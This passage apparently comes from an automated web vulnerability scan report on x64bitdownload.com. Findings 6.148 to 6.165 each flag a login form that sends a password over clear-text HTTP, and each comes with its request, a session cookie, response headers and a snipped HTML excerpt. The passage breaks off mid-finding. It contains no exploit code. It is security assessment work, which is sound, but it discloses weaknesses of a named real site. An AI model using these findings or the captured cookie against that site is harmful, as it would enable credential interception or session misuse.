Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88850


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.148. http://www.x64bitdownload.com/64-bit-cross-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-cross-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-cross-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90500


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.149. http://www.x64bitdownload.com/64-bit-download-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-download-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-download-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94324


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.150. http://www.x64bitdownload.com/64-bit-downloader-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-downloader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-downloader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98412


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.151. http://www.x64bitdownload.com/64-bit-explorer-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-explorer-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-explorer-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:55 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22explorer%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22explorer%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93074


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.152. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:44 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A32%3A%22ext2fs-ext3fs-paragon-extbrowser%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A32%3A%22ext2fs+ext3fs+paragon+extbrowser%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29987


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.153. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-fast-download-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-fast-download-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22fast-download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22fast+download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96343


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.154. http://www.x64bitdownload.com/64-bit-feed-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-feed-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-feed-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.155. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-feedreader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-feedreader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41067


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.156. http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-file-grabber-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-file-grabber-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94024


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.157. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-file-sharing-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-file-sharing-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-sharing%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+sharing%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94396


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.158. http://www.x64bitdownload.com/64-bit-firefox-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-firefox-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-firefox-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22firefox%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22firefox%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97672


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.159. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-forum-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-forum-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33899


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.160. http://www.x64bitdownload.com/64-bit-forum-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-forum-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-forum-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:32 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:58 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91001


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.161. http://www.x64bitdownload.com/64-bit-forums-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-forums-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-forums-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.162. http://www.x64bitdownload.com/64-bit-google-groups-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-google-groups-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-google-groups-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22google-groups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22google+groups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81360


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.163. http://www.x64bitdownload.com/64-bit-grabber-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-grabber-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-grabber-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98790


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.164. http://www.x64bitdownload.com/64-bit-group-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-group-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-group-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:42 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86955


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.165. http://www.x64bitdownload.com/64-bit-groups-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-groups-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
